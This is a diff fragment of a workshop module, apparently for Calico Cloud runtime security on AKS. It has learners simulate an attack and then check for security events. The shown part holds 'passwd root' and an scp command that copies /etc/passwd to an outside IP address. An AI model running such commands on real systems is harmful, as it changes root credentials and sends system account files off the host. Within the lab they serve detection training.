tigera-solutions/cc-aks-implement-runtime-security/mod/module-4-threat-defence.md

    passwd root
    scp -o ConnectTimeout=3 /etc/passwd goomba@198.13.47.158:/tmp/
    ```
-   Wait another minute and look in the Calico Cloud UI in the `Activity` > `Alerts` again.
+   Wait another minute and look in the Calico Cloud UI in the `Threat Defense` > `Security Events` again.

+   You should be able to see the following security events:

 ---